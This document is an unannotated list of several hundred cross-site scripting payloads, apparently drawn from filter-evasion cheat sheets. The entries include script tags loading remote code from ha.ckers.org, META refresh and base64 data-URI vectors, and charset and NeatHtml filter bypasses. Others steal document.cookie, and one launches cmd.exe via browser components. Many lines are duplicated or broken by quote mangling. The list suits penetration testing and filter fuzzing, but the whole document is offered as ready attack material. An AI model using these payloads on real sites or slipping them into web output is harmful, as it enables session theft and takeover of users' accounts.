- <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <LINK REL=\”stylesheet\” HREF=\”http://ha.ckers.org/xss.css\”>
- <LINK REL=\”stylesheet\” HREF=\”javascript:alert(‘XSS’);\”>
- <<SCRIPT>alert(“XSS”);//<</SCRIPT>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- <<SCRIPT>alert(\”XSS\”);//<</SCRIPT>
- <META HTTP-EQUIV=\”Link\” Content=\”<http://ha.ckers.org/xss.css>; REL=stylesheet\”>
- <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”>
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”><META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\”
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\”
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”>
- <META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>\”>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
- <OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http://ha.ckers.org/scriptlet.html\”></OBJECT>
- <SCRIPT a=\”>’>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT \”a=’>’\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT a=`>` SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT a=\”>\” ‘’ SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT a=\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <script>alert('123');</script>
- <SCRIPT>alert('XSS')</SCRIPT>
- <script>alert(document.cookie);<script>alert
- <script>alert(document.cookie);</script>
- <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <SCRIPT>alert(/XSS/.source)</SCRIPT>
- <SCRIPT>alert(‘XSS’);</SCRIPT>
- <SCRIPT>a=/XSS/
- <SCRIPT>document.write(\”<SCRI\”);</SCRIPT>PT SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- </script><script>alert(1)</script>
- </script><script>confirm(1)</script>
- <script>prompt('1')</script>
- <SCRIPT =\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT SRC=//ha.ckers.org/.js>
- <SCRIPT SRC=//ha.ckers.org/.j>
- <SCRIPT SRC=\”http://ha.ckers.org/xss.jpg\”></SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <SCRIPT/SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- <SCRIPT SRC=http://ha.ckers.org/xss.js
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
- <SCRIPT/XSS SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <scrscriptipt>alert(1)</scrscriptipt>
- <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN>
- <STYLE>.XSS{background-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><A CLASS=XSS></A>
- <STYLE>BODY{-moz-binding:url(\”http://ha.ckers.org/xssmoz.xml#xss\”)}</STYLE>
- <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <STYLE>@import’http://ha.ckers.org/xss.css’;</STYLE>
- <STYLE>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</STYLE>
- <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- lt;STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(‘XSS’)\”)}</STYLE>
- <STYLE TYPE=\”text/javascript\”>alert(‘XSS’);</STYLE>
- <svg/onload=alert(63)//
- <svg/onload=alert(1)>
- <t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”>
- <TABLE BACKGROUND=\”javascript:alert(‘XSS’)\”>
- <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
- <TABLE><TD BACKGROUND=\”javascript:alert(‘XSS’)\”>
- <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
- </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- </TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT>
- <?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”>
- <XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(‘XSS’);\”>]]>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
- <XML ID="xss"><I><B><IMG SRC="javas<! — — >cript:alert('XSS')"></B></I></XML>
- <XML ID=\”xss\”><I><B><IMG SRC=\”javas<! — — >cript:alert(‘XSS’)\”></B></I></XML>
- <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
- <XML SRC=\”xsstest.xml\” ID=I></XML>
- ‘’;! — \”<XSS>=&{()}
- <XSS STYLE=\”behavior: url(xss.htc);\”>
- <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
- <XSS STYLE="xss:expression(alert('XSS'))">
- <XSS STYLE=\”xss:expression(alert(‘XSS’))\”>
- maliciousdata[varinput[‘name’]] = payloads[1]
- <marguee/onstart=alert(1)>//INJECTX
- <marker id=”a” markerWidth=”1000" markerHeight=”1000" refX=”0" refY=”0">
- “><marquee>confirm( `bypass :)`)</marquee>
- <marquee/finish=confirm(2)>/
- ‘“>><marquee><h1>1</h1></marquee>
- <marquee><h1>XSS by xss</h1></marquee>
- ‘>><marquee><h1>XSS</h1></marquee>
- ‘>><marquee><h1>XSS</h1></marquee>
- ‘“>><marquee><h1>XSS</h1></marquee>
- ‘“>><marquee><h1>XSS</h1></marquee>
- ‘“>><marquee><img src=x onerror=confirm(1)></marquee>
- ‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)>
- “>><marquee><img src=x onerror=confirm(1)></marquee>” ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” ></script><script>alert(1)</script>”><img/id=”confirm( 1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http: //i.imgur.com/P8mL8.jpg”>
- ‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script><script>alert(1)</script>”><img/id=”confirm(1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http://i.imgur.com/P8mL8.jpg">
- <marquee loop=1 width=0 onfinish=alert(1)>
- >><marquee loop=1 width=0 onfinish=alert(1)>
- <marquee loop=1 width=0 onfinish=alert(100)>
- <marquee loop=1 width=0 onfinish=alert(1)>//INJECTX
- <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
- <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)
- /><marquee onfinish=confirm(123)>a</marquee>
- /><marquee onfinish=confirm(123)>a</marquee>
- <marquee onScroll marquee onScroll=”javascript:javascript:alert(1)”></marquee onScroll>
- <mArquee onStart%3D[~[onmouseleave(([[(alert(1))]]))]] ]
- <marquee/onstart=alert()>
- <marquee onstart=alert(1)>
- <marquee/onstart=alert(1)>renwa
- <marquee onstart=alert(30)></marquee>
- <marquee onstart=alert(99)>
- <marquee onstart=alert(‘XSS’)>
- <marquee/onstart=confirm(2)>/
- <marquee/onstart=confirm(2)>
- <marquee/onstart=confirm(/XSS/.source);confirm(1)>
- ><marquee/onstart=confirm(/XSS/.source);confirm(1)>
- “<marquee/onstart=confirm(/XSS/.source);confirm(1)>”
- “\”><marquee/onstart=confirm(/XSS/.source);confirm(1)>”,
- <marquee/onstart=document.body.innerHTML=location.hash>//#<img src=x onerror=prompt(1)>>
- <marquee onstart=’javascript:alert(‘1’);’>=(?_?)=
- <marquee onstart=’javascript:alert(1)’>^__^
- <marquee onstart=’javascript:confirm(1)’>^__^
- <marquee onStart marquee onStart=”javascript:javascript:alert(1)”></marquee onStart>
- <marquee/onstart=this[‘innerHTML’]=location.hash;>//#<img src=x onerror=alert(document.domain)>
- <marquee/onstart=this[‘innerHTML’]=unescape(location.hash);>//#<img src=x onerror=alert(document.domain)>
- <marquee><script>alert(‘XSS’)</script></marquee>
- <marquee><script>alert(‘XSS’)</script></marquee>
- ‘;’>”><marquee>test</marquee><plaintext/onmouseover=prompt(test)>
- <math><annotation-xml encoding=text/html><![CDATA[></math><!]]>
- <math><annotation-xml encoding=text/html><script></</script/>a<!>l<?>ert(</>1)</></script>
- <math><annotation-xml encoding=”text/html”><xmp></xmp><img src=x onerror=alert(1)></xmp>
- <math><annotation-xml><textarea/><svg><script>alert(1)</script>
- <math><a xlink:href=javascript:…>
- <math><a xlink:href=javascript:alert(1)>M
- <math><a/xlink:href=javascript:confirm(1)>click
- <math><a/xlink:href=javascript:eval(‘\141\154\145\162\164\50\61\51’)>X
- <math><a xlink:href=”//jsfiddle.net/t846h/”>click //
- <math><a xlink:href=”//jsfiddle.net/t846h/”>click
- <math><a xlink:href=”//jsfiddle.net/t846h/”>click
- <Math> <a xlink:href=”//jsfiddle.net/t846h/”> click
- <math><brute href=javascript:alert(1)>
- <math><brute href=javascript:alert(1)>click *
- <math><brute href=javascript:alert(1)>click
- <math><brute href=javascript:alert(1)>click
- <math><brute xlink:href=javascript:alert(175)>click
- <math><brute xlink:href=javascript:alert(1)>click *
- <math><brute xlink:href=javascript:alert(1)>click
- <math><brute xlink:href=javascript:alert(1)>click
- <math href=”javascript:alert(1)”>CLICKME
- <math href=”javascript:javascript:alert(1)”>CLICKME</math> <math> <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:javascript:alert(1)”>CLICKME</maction> </math>
- <math href=”javascript:javascript:alert(1)”>CLICKME</math> <math> <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:javascript:alert(1)”>CLICKME</maction> </math>
- <math><kukux href=javascript:alert(164)>click
- <math><kukux xlink:href=javascript:alert(175)>click
- <math><maction actiontype=”statusline#http://google.com" href=”//evil”>click
- <math><script>//<head><script>alert(1)</script>
- <math><script>sgl=’<img/src=xx:x onerror=alert(1)>’</script>
- <math><style>*{font-family:’<img/src=xx:x onerror=alert(1)>’}</style>
- <math><!V href=javascript:alert(1)//
- <math><!V” href=javascript:alert(1)//
- <math xlink:href=javascript:..>
- <math xlink:href=”jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”>click me</math>
- <math xml:base=”javascript:alert(1)//”><mrow href=”#”>qwe</mrow></math>
- <math xml:base=”javascript:alert(1)//”> <mrow href=”#”>qwe</mrow></math>
- <math><XSS href=”javascript:alert(location)”>aaa
- {{m=[({}).constructor.defineProperties];[[‘’.toString.constructor,{‘constructor’:{} }].reduce(m[0])];’’.toString.constructor(‘alert(1)’)()}}
- <me#a http-equiv=Content-Security-Policy content=script-src self>
- me!</button></form></dialog>
- <menu id=x contextmenu=x onshow=alert(107)>right click me!
- <menu id=x contextmenu=x onshow=alert(1)>right click me!
- <meta charset=gbk><script>a=’x?\’;alert(1)//’;</script>
- <meta charset=iso-2022-cn>
- <meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J
- <meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>
- <meta charset=iso-2022-jp><script>alert(14)[0x1B]$@[0x0A]</script>
- <meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>
- <meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(13)>
- <meta charset=”mac-farsi”>?script?javascript:alert(1)?/script?
- <meta charset=”x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
- <meta charset= “x-imap4-modified-utf7”&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
- <meta charset=”x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
- <meta charset=”x-mac-farsi”>A?A?script A?A?confirm(1)//A?A?/script A?A?
- <meta/content=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==”http-equiv=refresh>
- <meta content=”
 1 
; JAVASCRIPT: alert(1)” http-equiv=”refresh”/>
- <meta content=”
 1 
;JAVASCRIPT: alert(1)” http-equiv=”refresh”/>
- <Meta content = “& NewLine; 1 & NewLine ;; JAVASCRIPT & colon; alert (1)” http-equiv = “refresh” />
- <meta content=”
 1 
; JAVASCRIPT: confirm(1)” http-equiv=”refresh”/>
- <META HTTP-EQUIV=”Link” Content=”<%(css)s>; REL=stylesheet”>
- <;META HTTP-EQUIV=”;Link”; Content=”;<;http://ha.ckers.org/xss.css>;; REL=stylesheet”;>;
- <META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css>;; REL=stylesheet”>
- <meta HTTP-EQUIV=”Link” Content=”<http://www.securitycompass.com/xss.css>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<http://xss.cx/xss.css>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<http://xxxx.com/xss.css>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<javascript:alert(‘XSS’)>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<javascript:confirm(document.location)>; REL=stylesheet”>
- <meta http-equiv=”refresh” content=”0;
- <meta http-equiv=refresh content=”0 javascript:alert(1)”>
- <meta http-equiv=”refresh” content=”0;javascript:alert(1)”/>
- <meta http-equiv=”refresh” content=”0;javascript:alert(1)”/>?
- <meta http-equiv=”refresh” content=”0;javascript:alert(1)”/>
- <Meta http-equiv = “refresh” content = “0; javascript & colon; alert (1)” />
- <meta http-equiv=”refresh” content=”0;javascript:confirm(1)”/>?
- <meta http-equiv=”refresh” content=”0;javascript:confirm(1)”/>
- “><meta http-equiv=”refresh” content=”0;javascript:confirm(1)”/>
- <meta http-equiv=refresh content=”0 javascript:confirm(1)”>
- <meta http-equiv=”refresh” content=”0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”>
- <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”;>;
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
- <meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”>
- <meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”>
- <Meta http-equiv = “refresh” content = “0; url = // goo.gl/nlX0P”>
- <meta http-equiv=”refresh” content=”0;url=http://good/[>>>inj];url=http://evil/[<<<inj]">
- <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0; URL=http://;URL=javascript:alert(';XSS';);";>;
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert('XSS');">
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert('XSS');">
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(XSS);">
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert('XSS');\">
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:confirm(document.location);">
- <meta HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:document.vulnerable=true;">
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:javascript:alert(1);">
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(1);\”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XoSS’);”>
- <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0;url=javascript:alert(‘;XSS’;);”;>;
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(XSS);”>
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”>
- <meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:confirm(document.location);”>
- <meta http-equiv=”refresh” content=”0;url=javascript:document.vulnerable=true;”>
- <meta HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:document.vulnerable=true;”>
- “><meta http-equiv=”Refresh” content=”0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
- “><meta http-equiv=”Refresh”content=”0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:javascript:alert(1);”>
- <meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)>
- <meta http-equiv=refresh content=”?,javascript:alert(1)”>
- <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>
- <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>confirm(document.location)</SCRIPT>”>
- <;META HTTP-EQUIV=”;Set-Cookie”; Content=”;USERID=<;SCRIPT>;alert(‘;XSS’;)<;/SCRIPT>;”;>;
- <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>
- <meta HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.vulnerable=true</SCRIPT>”>
- <meta http-equiv=”x-ua-compatible” content=”ie=7">
- <meta http-equiv=”x-ua-compatible” content=”ie=7"><iframe src=//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>
- <meta http-equiv=”x-ua-compatible” content=”ie=7"><iframe src=��//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>��
- <meta http-equiv=x-ua-compatible content=ie=8>
- <meta http-equiv=”x-ua-compatible” content=”ie=9">
- <meta http-equiv=”x-ua-compatible” content=”ie=9"><iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e name=javascript:alert(document.domain)>
- <meta name=referrer content=never>
- <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow=”alert(1)”;
- <meta style=”xss:expression(open(alert(1)))” />
- <meter onmouseover=”alert(1)”
- method=”dialog”><button>Close
- <MovieHeight>600</MovieHeight>
- ?movieName=”;]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);//
- <MovieURL>http://thebest404pageever.com/swf/FUUUUUUUUUUUUUUUUUUUUUUUUUCK.swf</MovieURL>
- <MovieWidth>800</MovieWidth>
- moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
- $=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/)
- $=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/)
- myTagid=”someId” class=”class1vdata-foo=”bar” /myTag
- myTagid=”someId” class=”class1vdata-foo=”bar”?/myTag
- name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name)
- name=javascript:alert(document.domain)>
- name=”javascript:alert(“XSS”)”></iframe>
- <name>’,’’)); phpinfo(); exit;/*</name>
- navigateToURL(new URLRequest(“Javascript: document.write(\”<script>confirm(1)</scr\”+\”ipt>\”)”),”_self”)
- navigator.geolocation.getCurrentPosition(function(p){
- navigatorurl:test” -chrome “javascript:C=Components.classes;I=Components.interfaces;file=C[\’@mozilla.org/file/local;1\’].createInstance(I.nsILocalFile);file.initWithPath(\’C:\’+String.fromCharCode(92)+String.fromCharCode(92)+\’Windows\’+String.fromCharCode(92)+String.fromCharCode(92)+\’System32\’+String.fromCharCode(92)+String.fromCharCode(92)+\’cmd.exe\’);process=C[\’@mozilla.org/process/util;1\’].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
- navigator.vibrate(500)
- navigator.webkitGetUserMedia({‘video’:true},function(s){
- navigator.webkitGetUserMedia({video:true},function(s){
- \nconfirm(1)
- <NeatHtmlLt /><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- <NeatHtmlLt /><? echo(‘<NeatHtmlLt /><SCR)’; echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
- <NeatHtmlLt /><IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
- <NeatHtmlLt /><IMG SRC=javascript:alert('XSS')>
- <NeatHtmlLt /><IMG SRC=javascript:alert('XSS')>
- <NeatHtmlLt /><IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
- <NeatHtmlLt /><IMG SRC=”javascript:alert(‘XSS’)”
- <NeatHtmlLt /><IMG SRC=javascript:alert('XSS')>
- <NeatHtmlLt /><?import namespace=”xss”implementation=”http://ha.ckers.org/xss.htc">
- <NeatHtmlLt /><META HTTP-EQUIV=”Link” Content=”<NeatHtmlLt /><http://ha.ckers.org/xss.css>; REL=stylesheet”>
- <NeatHtmlLt /><META HTTP-EQUIV=”refresh”CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
- <NeatHtmlLt /><META HTTP-EQUIV=”refresh” CONTENT=”0;URL=http://;URL=javascript:alert('XSS');">
- <NeatHtmlLt /><META HTTP-EQUIV=”refresh”CONTENT=”0;url=javascript:alert(‘XSS’);”>
- <NeatHtmlLt /><META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>
- <NeatHtmlLt /><<SCRIPT>alert(“XSS”);//<NeatHtmlLt /><</SCRIPT>
- <NeatHtmlLt /><SCRIPT\s” != “<NeatHtmlLt /><SCRIPT/XSS\s
- <NeatHtmlLt /><SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- <NeatHtmlLt /><SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- /<NeatHtmlLt /><script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i
- <NeatHtmlLt /><SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <NeatHtmlParserReset s=’’ d=”” /><script></script><TABLE BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- <NeatHtmlReplace_BASE HREF=”javascript:alert(‘XSS’);//”>
- <NeatHtmlReplace_BGSOUND SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
- <NeatHtmlReplace_BODY BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- <NeatHtmlReplace_BODY ONLOAD_NeatHtmlReplace=”alert(‘XSS’)”>
- <NeatHtmlReplace_C><IMG SRC="javascript:alert(‘XSS’);">
- </NeatHtmlReplace_C></NeatHtmlReplace_X></NeatHtmlReplace_xml><SPAN DATASRC_NeatHtmlReplace=”#I” DATAFLD_NeatHtmlReplace=”C” DATAFORMATAS_NeatHtmlReplace=”HTML”></SPAN>
- <NeatHtmlReplace_EMBED SRC_NeatHtmlReplace=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess_NeatHtmlReplace=”always”></NeatHtmlReplace_EMBED>
- <NeatHtmlReplace_EMBED SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.swf" AllowScriptAccess_NeatHtmlReplace=”always”></NeatHtmlReplace_EMBED>
- <NeatHtmlReplace_FRAMESET><NeatHtmlReplace_FRAME SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”></NeatHtmlReplace_FRAMESET>
- </NeatHtmlReplace_HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <NeatHtmlReplace_HEAD><NeatHtmlLt /><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7">
